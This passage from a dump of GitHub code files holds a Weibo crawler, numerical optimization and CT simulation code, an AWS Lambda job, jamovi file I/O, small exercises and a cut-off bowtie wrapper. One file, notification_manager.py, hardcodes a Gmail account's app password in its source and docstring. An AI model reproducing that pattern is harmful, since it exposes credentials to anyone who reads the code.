d[0]\n\telse:\n\t\tnd[1], nd[0] = d[1], d[0]\n\treturn nd\nif __name__ == \"__main__\":\n\ttaskf, start_date, end_date, data_dir, gap = argv[1], argv[2], argv[3], argv[4], argv[5]\n\tif len(argv) == 7:\n\t\tstatus = {'keyword':argv[6]}\n\telse:\n\t\tstatus = {}\n\tinf = open(taskf, 'r')\n\tkeywords = []\n\tfor line in inf:\n\t\tif not (line[:-1] in keywords):\n\t\t\tkeywords.append(line[:-1])\n\tinf.close()\n\tsd = start_date.split('-')\n\tsd = [int(item) for item in sd]\n\ted = end_date.split('-')\n\ted = [int(item) for item in ed]\n\ttry:\n\t\tos.mkdir(data_dir)\n\texcept:\n\t\tpass\n\t#time.sleep(3600)\n\t\"\"\"\n\tl = Usr_batch_login(num_usrs=40)\n\tl.login()\n\texit()\n\t\"\"\"\n\twhile compare(sd, ed) <= 0:\n\t\tssd = [str(item) if len(str(item)) > 1 else '0'+str(item) for item in sd]\n\t\tdate = '-'.join(ssd)\n\t\ttry:\n\t\t\tos.mkdir(data_dir+'/'+date)\n\t\texcept:\n\t\t\tpass\n\t\tfor keyword in keywords:\n\t\t\ttry:\n\t\t\t\tos.mkdir(data_dir+'/'+date+'/'+keyword)\n\t\t\texcept:\n\t\t\t\tpass\n\t\twhile True:\n\t\t\tt = Crawler(num_usr_th=36, keywords=keywords, date=date, data_dir=data_dir+'/'+date, status=status, gap=gap)\n\t\t\tstatus = t.crawl()\n\t\t\tif status == {}:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tl = Usr_batch_login(num_usrs=40)\n\t\t\t\tl.login()\n\t\tsd = next(sd)\n#print ()\n\n#print ()\n\n\n","repo_name":"chaozc/sina_weibo_crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25529314582","text":"from lab4.brent import *\r\nfrom sympy import *\r\nimport numpy as np\r\nfrom re import findall\r\nfrom re import sub\r\n\r\n\r\nclass AdjGrad:\r\n def find(self, z, x, e, flag1, flag2, extr):\r\n c = 0\r\n func = sympify(z)\r\n l = Symbol('l')\r\n lst_xi = np.sort(list(set(findall(r'[x]\\d', z))))\r\n\r\n grad = []\r\n for i in range(len(lst_xi)):\r\n grad.append(func.diff(lst_xi[i]))\r\n x = np.array(x)\r\n j = 0\r\n while True:\r\n i = 0\r\n su = dict(zip(lst_xi, x))\r\n calc_grad = []\r\n for k in range(len(lst_xi)):\r\n calc_grad.append(grad[k].subs(su))\r\n calc_grad = np.array(calc_grad)\r\n S = -1 * calc_grad\r\n x_jk = x\r\n\r\n while i + 1 < len(lst_xi):\r\n\r\n lam = x + l * S\r\n su1 = dict(zip(lst_xi, lam))\r\n f_l = str(func.subs(su1))\r\n f_l = sub(r'l', r'x', f_l)\r\n lam = BrentMet()\r\n\r\n l_min = lam.find(f_l, -100, 100, e * 10, 100)\r\n # minimize(lambdify('x', sympify(f_l)), [0])['x'][0]\r\n\r\n x_jk_1 = x_jk + l_min * S\r\n\r\n su_xjk_1 = dict(zip(lst_xi, x_jk_1))\r\n calc_grad_xjk_1 = []\r\n for k in range(len(lst_xi)):\r\n calc_grad_xjk_1.append(grad[k].subs(su_xjk_1))\r\n calc_grad_xjk_1 = np.array(calc_grad_xjk_1)\r\n\r\n sum_grad = (calc_grad ** 2).sum()\r\n sum_grad_k = (calc_grad_xjk_1 ** 2).sum()\r\n Skj = -1 * calc_grad_xjk_1 + (sum_grad_k / sum_grad) * S\r\n\r\n met_Skj = (Skj ** 2).sum() ** (1 / 2)\r\n #su_after = su_xjk_1\r\n\r\n x_beauty = x_jk_1\r\n if flag1 == 1:\r\n print(tuple(x_beauty))\r\n\r\n x_met = ((x_jk_1 - x_jk) ** 2).sum() ** (1 / 2)\r\n # Написать датасеты использовать x_beauty\r\n if extr == 0:\r\n\r\n if (met_Skj < e) or (x_met < e):\r\n #print(f'Минимум в точке {tuple(x_beauty)}')\r\n #print(f'Значение функции в точке минимума {float(func.subs(su_after))}')\r\n c = 1\r\n break\r\n else:\r\n if (met_Skj < e) or (x_met < e):\r\n #print(f'Максимум в точке {tuple(x_beauty)}')\r\n #print(f'Значение функции в точке максимума {float(func.subs(su_after))}')\r\n c = 1\r\n break\r\n x_jk = x_jk_1\r\n S = Skj\r\n i += 1\r\n if c == 1:\r\n break\r\n x = x_jk\r\n j += 1\r\n return x_beauty\r\n\r\n#function = AdjGrad()\r\n#function.find('0.95*x1 + 0.95*x2 + 0.5*(-1.0*x1 + 1.0*x2 + 1)**2', [0, 0], 0.0001, 0, 0, 0)\r\n","repo_name":"dartnow21/lab4","sub_path":"AdjGrad.py","file_name":"AdjGrad.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10450535720","text":"import queue\nimport threading\nfrom dadivity_constants import *\nimport dadivity_config\nimport send_email\nimport time\nimport logging\n\nMAX_RETRIES = 4\nRESET_FLAG = -1\nHOUR = 60 * 60\n\nclass Email_Retry_Manager(object):\n \"\"\" Retry sending email after an error.\n\n Interval between retries becomes progressivly longer if attempts\n continue to fail.\n \"\"\"\n\n def __init__(self, event_queue, destination_list, test_flags=[]):\n self._q = event_queue\n self._destination_list = destination_list\n self._retry_counter = RESET_FLAG\n self._retry_timer = None\n self._test_flags = test_flags\n self._msg = \"\"\n self._subject = \"\"\n if FAST_RETRY in self._test_flags:\n self._base_wait = 1 # seconds\n elif FAST_MODE in self._test_flags:\n self._base_wait = 10\n else:\n self._base_wait = HOUR\n\n def start_retrying(self, subject, msg):\n \"\"\" Call this the first time to start the retry process.\n\n After the first time, retries are handled in motion_email_retry.\n \"\"\"\n self._msg = msg\n self._subject = subject\n if self._retry_timer != None:\n self._retry_timer.cancel()\n self._retry_timer = threading.Timer(self._base_wait, self._q.put, [self])\n self._retry_timer.start()\n self._retry_counter = 1\n\n def retry_again(self):\n \"\"\" Schedule another retry.\"\"\"\n if self._retry_counter < MAX_RETRIES:\n wait_multiplier = 2 ** self._retry_counter # 2, 4, 8\n self._retry_timer = threading.Timer(self._base_wait * wait_multiplier,\n self._q.put, [self])\n self._retry_timer.start()\n self._retry_counter += 1\n else:\n self._retry_counter = RESET_FLAG\n\n def reset(self):\n self._retry_counter = RESET_FLAG\n if self._retry_timer != None:\n self._retry_timer.cancel()\n\n def callback(self):\n return {\"event\":RETRY_MOTION_EMAIL}\n\n def motion_email_retry(self):\n \"\"\" Try to send again.\n\n Called after timer puts instance of self in queue and callback returns\n a message which is dispatched as a call to this method.\n \"\"\"\n email_error = None\n current_retry_counter = self._retry_counter\n # save current value because it's incremented in retry_again()\n logging.debug(\"current_retry_counter = \" + str(current_retry_counter))\n if self._retry_counter != RESET_FLAG:\n message = \"retry # \" + str(self._retry_counter) + \"\\n\" + self._msg\n email_error = send_email.dadivity_send(self._subject,\n self._destination_list,\n message,\n self._test_flags)\n if email_error != None:\n self.retry_again()\n\n return {\"event\":EMAIL_RETRY, \"email_error\":email_error, \"retry_counter\":current_retry_counter}\n\n########################################################################\n#\n# The rest is testing stuff\n#\n########################################################################\n\nif __name__ == \"__main__\":\n\n # debugging stuff, normally commented out.\n #from pudb import set_trace; set_trace()\n logging.basicConfig(level=logging.DEBUG)\n\n ONE_YEAR_TIMEOUT = 365 * 24 * 60 *60\n\n per_hour_counters = [0] * 24\n event_queue = queue.Queue()\n erm = Email_Retry_Manager(event_queue,\n dadivity_config.email_recipients,\n test_flags=[FAST_RETRY, MOCK_ERROR, JUST_PRINT_MESSAGE])\n erm.start_retrying(\"test subject\", \"test message\")\n\n try:\n\n for i in range(10):\n event = event_queue.get(timeout=ONE_YEAR_TIMEOUT)\n message = event.callback()\n print(repr(message))\n if message[\"event\"] == RETRY_MOTION_EMAIL:\n erm.motion_email_retry()\n print(time.asctime())\n print(\"\\n*********************************************\\n\")\n # if i == 2:\n # erm.reset()\n # print \"\\n---------- reset ---------\\n\"\n\n except KeyboardInterrupt: pass\n\n","repo_name":"dmclane/dadivity_motion_mon","sub_path":"email_retry_manager.py","file_name":"email_retry_manager.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12998969098","text":"import awswrangler as wr\nimport pandas as pd\nimport urllib.parse\nimport os\n\n# Enviroment variables\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\nos_input_write_data_operation = os.environ['write_data_operation']\n\n\ndef lambda_handler(event, context):\n # Get object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n try:\n \n # Create Database if not exists\n databases = wr.catalog.databases()\n \n if os_input_glue_catalog_db_name not in databases.values:\n wr.catalog.create_database(os_input_glue_catalog_db_name)\n print(databases)\n else:\n print(f\"Database {os_input_glue_catalog_db_name} already exists\")\n \n \n # Creating DF from content\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\n\n # Extract required columns:\n df_step_1 = pd.json_normalize(df_raw['items'])\n \n # convert id from string to int\n df_step_1['id'] = pd.to_numeric(df_step_1['id'])\n \n print(df_step_1.info())\n\n # Write to S3\n wr_response = wr.s3.to_parquet(\n df=df_step_1,\n path=os_input_s3_cleansed_layer,\n dataset=True,\n database=os_input_glue_catalog_db_name,\n table=os_input_glue_catalog_table_name,\n mode=os_input_write_data_operation\n )\n\n return wr_response\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n","repo_name":"FelipeTe/youtube-elt-aws","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35244679984","text":"import torch\nimport xraylib\nfrom torch.utils.checkpoint import checkpoint as checkpoint_gradients\n\n\ndef mass_attenuation(energies, compound):\n \"\"\"\n Total X-ray absorption for a given compound in cm2g.\n Units: KeV.\n\n \"\"\"\n attenuations = [xraylib.CS_Total_CP(compound, e.item()) for e in energies]\n return torch.tensor(attenuations, device=energies.device)\n\n\ndef bremsstrahlung(energies, energy_max):\n r\"\"\"\n Simple bremstrahlung model (Kramer formula). Emax\n \"\"\"\n # Kramer:\n spectrum = energy_max / energies - 1\n spectrum[spectrum < 0] = 0\n return spectrum / spectrum.mean()\n\n\ndef scintillator_efficiency(energies, compound, rho, thickness):\n \"\"\"\n Generate QDE of a detector (scintillator).\n Units: KeV, g/cm3, mm.\n\n References: 10.3390/jimaging6040018, 10.1118/1.595357, 10.1109/23.682433\n\n \"\"\"\n # Attenuation by the photoelectric effect:\n photoelectric = [xraylib.CS_Photo_CP(compound, e.item()) for e in energies]\n photoelectric = torch.tensor(photoelectric, device=energies.device)\n spectrum = 1 - torch.exp(-rho * photoelectric * thickness/10)\n spectrum *= energies # spectral response is assumed to be proportional to E\n return spectrum / spectrum.mean()\n\n\ndef total_transmission(energies, compound, rho, thickness):\n \"\"\"\n Compute fraction of x-rays transmitted through the filter.\n Units: KeV, g/cm3, mm.\n\n \"\"\"\n return torch.exp(-rho * mass_attenuation(energies, compound) * thickness/10)\n\n\ndef effective_spectrum(energies, acceleration_voltage=90.0, filter=None, detector=None):\n \"\"\"\n Generate an effective spectrum of a CT scanner.\n Units: keV, kV.\n\n \"\"\"\n if filter is None:\n filter = {'material': 'Al', 'density': 2.7, 'thickness': 2.5}\n if detector is None:\n detector = {'material': 'CsI', 'density': 4.51, 'thickness': 0.5}\n # Tube:\n spectrum = bremsstrahlung(energies, acceleration_voltage)\n # Filter:\n spectrum *= total_transmission(energies, filter['material'],\n filter['density'], filter['thickness'])\n # Detector:\n spectrum *= scintillator_efficiency(energies, detector['material'],\n detector['density'], detector['thickness'])\n return spectrum / spectrum.mean()\n\n\ndef bilinear_attenuation(energies, Z_rel):\n \"\"\"\n Bilinear parametrization of X-ray absorption spectra of Martinez et al.\n Units: keV, unitless, g/cm3.\n\n Reference: 10.1016/j.apradiso.2015.09.014\n\n \"\"\"\n reference_mu = mass_attenuation(energies, 'H2O')\n\n def alpha(energies):\n A1 = 12179.0\n p = 2.8\n return 1 / (1 + A1*torch.pow(energies, -p))\n\n return reference_mu * (alpha(energies)*(1 - Z_rel**3.21) + Z_rel**3.21)\n\n\ndef spectral_projection(projector, energies, effective_spectrum,\n density_vols, compounds=None, Z_rels=None):\n \"\"\"\n Simulate projections taking integration over spectral domain into account.\n\n \"\"\"\n if compounds is not None and Z_rels is None:\n attenuations = torch.stack([mass_attenuation(energies, x) for x in compounds])\n elif Z_rels is not None and compounds is None:\n attenuations = torch.stack([bilinear_attenuation(energies, x) for x in Z_rels])\n else:\n raise ValueError('One of `compounds` or `Z_rels` should be specified.')\n\n density_projs = torch.stack([projector(x) for x in density_vols])\n\n def counts_E(intensity_E, density_projs, attenuations_E):\n # Beer-Lambert law for multiple materials at a given photon energy\n absorbance_E = torch.tensordot(density_projs, attenuations_E, dims=[[0], [0]])\n return intensity_E * torch.exp(-absorbance_E)\n\n if any([effective_spectrum.requires_grad, density_projs.requires_grad,\n attenuations.requires_grad]):\n # We probably do pipeline optimization (i.e. multiple function calls),\n # so compilation is justified\n counts_E_compiled = torch.jit.script(counts_E)\n # We are typically limited by memory if backward pass needs to be\n # calculated. Use gradient checkpointing to trade compute for memory\n counts_E = lambda *x: checkpoint_gradients(counts_E_compiled, *x)\n\n simulated_counts = torch.zeros_like(density_projs[0])\n for intensity_E, attenuations_E in zip(effective_spectrum, attenuations.T):\n simulated_counts += counts_E(intensity_E, density_projs, attenuations_E)\n simulated_counts /= effective_spectrum.sum()\n simulated_ints = -torch.log(simulated_counts)\n\n return simulated_ints\n","repo_name":"schoonhovenrichard/AutodiffCTWorkflows","sub_path":"autodiffCT/tomography/spectral.py","file_name":"spectral.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73681980963","text":"count = 0\nwith open(\"D:/word.txt\", \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n for word in line.replace(\"\\n\", \"\").split(\" \"):\n print(word)\n if word == \"itheima\":\n count += 1\nprint(count)\n# with open(\"D:/word.txt\", \"r\", encoding=\"utf-8\") as fp:\n# count = fp.read().count(\"itheima\")\n# print(count)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"leezanla/pythonpractice","sub_path":"文件/文件的打开.py","file_name":"文件的打开.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17972848967","text":"import random\r\nnummer = random.randint(1, 100)\r\n\r\nplayer_name = input(\"Hallo wie lautet dein Name?: \")\r\nversuche = 0\r\nprint(\"okay,\" + player_name + \" Du kannst anfangen eine Zahl zwischen 1 und 100 zu erraten\")\r\n\r\nwhile versuche < 6:\r\n raten = int(input())\r\n versuche += 1\r\n if raten < nummer:\r\n print(\"Zu niedrig\")\r\n if raten > nummer:\r\n print(\"Zu hoch\")\r\n if raten == nummer:\r\n break\r\nif raten == nummer:\r\n print(\"Du hast die Zahl in \" + str(versuche) + \" Versuchen erraten, und dir somit meinen Schatz verdient! \")\r\nelse:\r\n print(\"Du hast die Zahl nicht erraten die Zahl lautet: \" + str(nummer))\r\n\r\ninput(\"Drücke die Enter Taste um das Programm zu schließen\")\r\n","repo_name":"JustBurak01/Projects","sub_path":"Python/Burak_ZahlenRaten.py","file_name":"Burak_ZahlenRaten.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18743773445","text":"\nimport os\nimport os.path\nimport errno\nimport re\nimport importlib\n\nfrom collections import OrderedDict\n\nfrom .exceptions import FileReadError\nfrom .exceptions import FileWriteError\n\nfrom . import omv\nfrom . import blank\n\n_readers = None\n_writers = None\n\n\n__all__ = (FileReadError, FileWriteError) # prevent flake whining F401\n\n\ndef _init():\n global _readers\n global _writers\n\n _readers = OrderedDict()\n _writers = OrderedDict()\n\n plugins = os.listdir(os.path.dirname(__file__))\n plugins_py = list(filter(lambda x: x.endswith('.py'), plugins))\n if len(plugins_py) > 0:\n plugins = plugins_py\n plugins = filter(lambda x: x != '__init__.py', plugins)\n plugins = map(lambda x: '.' + x[:-3], plugins)\n else:\n plugins = filter(lambda x: x.endswith('.pyc'), plugins)\n plugins = filter(lambda x: x != '__init__.pyc', plugins)\n plugins = map(lambda x: '.' + x[:-4], plugins)\n\n plugins = list(sorted(plugins))\n\n for plugin in plugins:\n module = importlib.import_module(plugin, 'jamovi.server.formatio')\n if hasattr(module, 'get_readers'):\n module_readers = module.get_readers()\n module_readers = map(lambda x: (x[0], x), module_readers)\n _readers.update(module_readers)\n if hasattr(module, 'get_writers'):\n module_writers = module.get_writers()\n module_writers = map(lambda x: (x[0], x), module_writers)\n _writers.update(module_writers)\n\n\ndef get_readers():\n global _readers\n if _readers is None:\n _init()\n return _readers\n\n\ndef get_writers():\n global _writers\n if _writers is None:\n _init()\n return _writers\n\n\ndef read(data, path, prog_cb, settings, *, is_temp=False, title=None, ext=None):\n\n if title:\n data.title = title\n else:\n data.title, _ = os.path.splitext(os.path.basename(path))\n\n if ext is None:\n ext = os.path.splitext(path)[1].lower()\n if ext != '':\n ext = ext[1:]\n\n prog_cb(0)\n\n if path == '':\n blank.read(data)\n elif not os.path.exists(path):\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n elif ext == 'omv':\n omv.read(data, path, prog_cb)\n if not is_temp:\n data.path = path\n data.save_format = 'jamovi'\n elif ext == 'omt':\n omv.read(data, path, prog_cb)\n else:\n _import(data, path, prog_cb, settings, ext)\n\n fix_column_names(data)\n\n data.setup()\n\n\ndef _import(data, path, prog_cb, settings, ext):\n readers = get_readers()\n\n if ext is None:\n ext = os.path.splitext(path)[1].lower()[1:]\n\n if ext in readers:\n readers[ext][1](data, path, prog_cb, settings=settings)\n else:\n raise RuntimeError('Unrecognised file format')\n\n # if not is_temp:\n # data.import_path = path\n #\n # if _should_embed(path):\n # try:\n # embedded_name = os.path.basename(path)\n # embedded_path = 'orig' + os.path.splitext(embedded_name)[1].lower()\n # embedded_abs_path = os.path.join(data.instance_path, embedded_path)\n # shutil.copy(path, embedded_abs_path)\n # data.embedded_path = embedded_path\n # data.embedded_name = embedded_name\n # except OSError as e:\n # print(e)\n # pass\n\n\ndef write(data, path, prog_cb, content=None):\n writers = get_writers()\n\n try:\n temp_path = path + '.tmp'\n ext = os.path.splitext(path)[1].lower()[1:]\n if ext == 'omv' or ext == 'omt':\n omv.write(data, temp_path, prog_cb, content, is_template=(ext == 'omt'))\n elif ext in writers:\n writers[ext][1](data, temp_path, prog_cb)\n else:\n raise RuntimeError('Unrecognised file format')\n os.replace(temp_path, path)\n except Exception as e:\n try:\n os.remove(temp_path)\n except Exception:\n pass\n raise e\n\n\ndef is_supported(path):\n readers = get_readers()\n ext = os.path.splitext(path)[1].lower()[1:]\n return (ext in ('omv', 'omt')\n or ext in readers\n or ext in ('pdf', 'html', 'htm'))\n\n\ndef fix_column_names(dataset):\n\n dataset = dataset._dataset\n\n column_names = map(lambda column: column.name, dataset)\n column_names = list(column_names)\n\n for i, name in enumerate(column_names):\n name = re.sub(r'[\\s]+', ' ', name)\n column_names[i] = name\n\n for i, orig in enumerate(column_names):\n used = column_names[:i]\n if orig == '':\n orig = gen_column_name(i)\n else:\n orig = re.sub(r'`', '_', orig)\n orig = re.sub(r'^\\.', '_', orig)\n\n name = orig.strip()\n c = 2\n while name in used:\n name = '{} ({})'.format(orig, c)\n c += 1\n column_names[i] = name\n\n for i, name in enumerate(column_names):\n column = dataset[i]\n if column.name != name:\n column.name = name\n column.import_name = name\n\n\ndef gen_column_name(index):\n name = ''\n while True:\n i = index % 26\n name = chr(i + 65) + name\n index -= i\n index = int(index / 26)\n index -= 1\n if index < 0:\n break\n return name\n\n\n# def _should_embed(path):\n# import_cond = settings.get('embedCond')\n#\n# if import_cond == 'never':\n# return False\n# elif import_cond == 'always':\n# return True\n# else:\n# m = re.compile(r'^\\< ([1-9][0-9]*) ([KMB])b$', re.IGNORECASE).match(import_cond)\n# if m is None:\n# return False\n#\n# num = int(m.group(1))\n# mul = m.group(2).upper()\n# if mul == 'K':\n# max_embed = num * 1024\n# elif mul == 'M':\n# max_embed = num * 1024 * 1024\n# elif mul == 'G':\n# max_embed = num * 1024 * 1024 * 1024\n# else:\n# max_embed = 0\n#\n# return os.path.getsize(path) < max_embed\n","repo_name":"jamovi/jamovi","sub_path":"server/jamovi/server/formatio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":481,"dataset":"github-code","pt":"54"} +{"seq_id":"9149468742","text":"def day3():\n data = open(r'Inputs\\day3.in').read().splitlines()\n print('Part 1 result: ' + str(part1(data, 3, 1)))\n print('Part 2 result: ' + str(part2(data)))\n\ndef part1(data, right, down):\n x = 0\n dx = right # change in x\n dy = down # change in y\n trees = 0 # number of trees\n\n # loop through the rows, starting at 0 and increasing by the change in y each time\n for y in range(0, len(data), dy):\n # if our current spot is a # increment trees\n if (data[y][x] == \"#\"):\n trees += 1\n # increase x by the change in x value and then mod it with the length of the row\n # this handles the pattern looping\n x = (x + dx) % len(data[0])\n return trees\n\ndef part2(data):\n # each of these is one slope we want to try on the same algorithm\n slopes = [(1,1), (3,1), (5,1), (7,1), (1,2)]\n total = 1\n # run part 1 with each of the slopes in the list\n # multiplying the results by each other\n for slope in slopes:\n total *= part1(data, slope[0], slope[1])\n return total\n\nday3()","repo_name":"qkleinfelter/AdventOfCode2020","sub_path":"Solutions/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27777541200","text":"# -*- coding: utf-8 -*-\n\nimport smtplib\nimport ssl\nimport datetime\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n# Requires icalendar package: pip install icalendar\nfrom icalendar import Calendar, Event\n\n\"\"\"\nGmail profile:\n - Email: development.test.700@gmail.com\n - Password: nozx taub jlqc vhus (App password)\n\"\"\"\n\n\ndef send_email(args: dict = None) -> bool:\n \"\"\"This function sends an email with a calendar event.\n\n Args:\n args (dict, optional): Defaults to None.\n\n Returns:\n bool: True if the email was sent successfully, False otherwise.\n \"\"\"\n # Setting up the email receiver and sender\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"development.test.700@gmail.com\"\n receiver_email = args[\"to\"]\n password = \"nozx taub jlqc vhus\"\n\n # Creating the email message\n msg = MIMEMultipart()\n\n html = \"\"\"\n \n \n \n \n \n

A new tasks has been created!

\n

Here is the calendar appointment 😎

\n \n \n \"\"\"\n msg.attach(MIMEText(html, 'html'))\n\n # Creating the calendar event\n cal = Calendar()\n event = Event()\n event.add('summary', args[\"summary\"])\n year = int(args[\"year\"])\n month = int(args[\"month\"])\n day = int(args[\"day\"])\n event.add('dtstart', datetime.datetime(year, month, day, 0, 0, 0))\n event.add('dtend', datetime.datetime(year, month, day, 23, 59, 59))\n event.add('dtstamp', datetime.datetime.now())\n cal.add_component(event)\n\n # Attaching the calendar event to the email message\n ics = MIMEText(cal.to_ical().decode(), \"calendar;method=REQUEST\")\n ics.add_header('Content-Disposition', 'attachment', filename='invite.ics')\n msg.attach(ics)\n\n # Sending the email\n try:\n msg['Subject'] = \"New task!\"\n msg['From'] = sender_email\n msg['To'] = receiver_email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.send_message(msg, from_addr=sender_email,\n to_addrs=receiver_email)\n except Exception as e:\n return False\n return True\n","repo_name":"Isaac-PM/to-do-list","sub_path":"app/presentation/notification_manager.py","file_name":"notification_manager.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73866627042","text":"import numpy as np\r\nfrom nn.conv_util import ConvUtil\r\nfrom nn.activators import Identity\r\nfrom nn.base import Base\r\n\r\n\r\nclass MaxPooling(Base):\r\n def __init__(self, input_width, input_height, channel_number, filter_width, filter_height, stride):\r\n Base.__init__(self)\r\n self.channel_number = channel_number\r\n self.filter_width = filter_width\r\n self.filter_height = filter_height\r\n self.stride = stride\r\n self.output_width = int((input_width - filter_width) / self.stride + 1)\r\n self.output_height = int((input_height - filter_height) / self.stride + 1)\r\n self.output = np.zeros((self.channel_number, self.output_height, self.output_width))\r\n self.input_array = None\r\n self.learning_rate = None\r\n self.activator = Identity\r\n\r\n def forward(self, input_array):\r\n self.input_array = input_array\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch = ConvUtil.get_patch(input_array, i, j, self.filter_width, self.filter_height, self.stride)\r\n self.output[:, i, j] = np.max(patch, (-2, -1))\r\n\r\n def backward(self, sensitivity, learning_rate):\r\n self.learning_rate = learning_rate\r\n self.pre_delta = np.zeros(self.input_array.shape)\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch = ConvUtil.get_patch(self.input_array, i, j, self.filter_width, self.filter_height, self.stride)\r\n for d in range(self.channel_number):\r\n k, l = self.get_max_index(patch[d])\r\n self.pre_delta[d, i * self.stride + k, j * self.stride + l] = sensitivity[d, i, j]\r\n self.pre_delta *= self.pre_activator.backward(self.input_array)\r\n\r\n @staticmethod\r\n def get_max_index(array):\r\n \"\"\"\r\n Get index of max value in 2D array.\r\n \"\"\"\r\n pos = int(np.argmax(array))\r\n max_i, max_j = divmod(pos, array.shape[1])\r\n return max_i, max_j\r\n","repo_name":"administrator-zero/agent_yang","sub_path":"nn/max_pooling.py","file_name":"max_pooling.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73592709603","text":"import time\n\n\nclass Node(object):\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass NodeList(object):\n def __init__(self):\n self.head = Node()\n # self.head = Node()\n self.size = 0\n\n def addNode(self, data):\n newNode = Node(data=data)\n current = self.head\n if current.next is None and current.data is None:\n self.head = newNode\n else:\n while current.next is not None:\n current = current.next\n current.next = newNode\n\n def showList(self):\n current = self.head\n while current is not None:\n print(current.data, end=\" \")\n current = current.next\n print()\n\n\ndef swapPairs(head):\n if head is None or head.next is None:\n return head\n\n firstNode = head\n secondNode = head.next\n\n res = swapPairs(secondNode.next)\n\n firstNode.next = res\n secondNode.next = firstNode\n\n return secondNode\n\n\ndef fun():\n arr = [1, 2, 3, 4]\n nodeList = NodeList()\n for i in arr:\n nodeList.addNode(i)\n nodeList.showList()\n\n print()\n a = swapPairs(nodeList.head)\n b = a\n while b is not None:\n print(b.data, end=\" \")\n b = b.next\n\n print()\n nodeList.showList()\n\n return\n\n\nif __name__ == '__main__':\n start = time.clock()\n fun()\n stop = time.clock()\n print(f\"用时:\", stop - start)\n","repo_name":"gj-hat/Leetcode","sub_path":"24-两两交换链表中的节点/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72310659680","text":"#!/usr/bin/env python\n# small RNA oriented bowtie wrapper\n# version 1.5 17-7-2014: arg parser implementation\n# Usage sRbowtie.py <1 input_fasta_file> <2 alignment method> <3 -v mismatches> <4 out_type> <5 buildIndexIfHistory> <6 fasta/bowtie index> <7 bowtie output> <8 ali_fasta> <9 unali_fasta> <10 --num-threads \\${GALAXY_SLOTS:-4}>\n# current rev: for bowtie __norc, move from --supress 2,6,7,8 to --supress 6,7,8. Future Parser must be updated to take into account this standardisation\n# Christophe Antoniewski \n\nimport sys\nimport os\nimport subprocess\nimport tempfile\nimport shutil\nimport argparse\n\n\ndef Parser():\n the_parser = argparse.ArgumentParser(\n description=\"bowtie wrapper for small fasta reads\")\n the_parser.add_argument(\n '--input', action=\"store\", type=str, help=\"input file\")\n the_parser.add_argument(\n '--input-format', dest=\"input_format\", action=\"store\", type=str, help=\"fasta or fastq\")\n the_parser.add_argument('--method', action=\"store\", type=str,\n help=\"RNA, unique, multiple, k_option, n_option, a_option\")\n the_parser.add_argument('--v-mismatches', dest=\"v_mismatches\", action=\"store\",\n type=str, help=\"number of mismatches allowed for the alignments\")\n the_parser.add_argument(\n '--output-format', dest=\"output_format\", action=\"store\", type=str, help=\"tabular, sam, bam\")\n the_parser.add_argument(\n '--output', action=\"store\", type=str, help=\"output file path\")\n the_parser.add_argument(\n '--index-from', dest=\"index_from\", action=\"store\", type=str, help=\"indexed or history\")\n the_parser.add_argument('--index-source', dest=\"index_source\",\n action=\"store\", type=str, help=\"file path to the index source\")\n the_parser.add_argument(\n '--aligned', action=\"store\", type=str, help=\"aligned read file path, maybe None\")\n the_parser.add_argument('--unaligned', action=\"store\",\n type=str, help=\"unaligned read file path, maybe None\")\n the_parser.add_argument('--num-threads', dest=\"num_threads\",\n action=\"store\", type=str, help=\"number of bowtie threads\")\n args = the_parser.parse_args()\n return args\n\n\ndef stop_err(msg):\n sys.stderr.write('%s\\n' % msg)\n sys.exit()\n\n\ndef bowtieCommandLiner(alignment_method=\"RNA\", 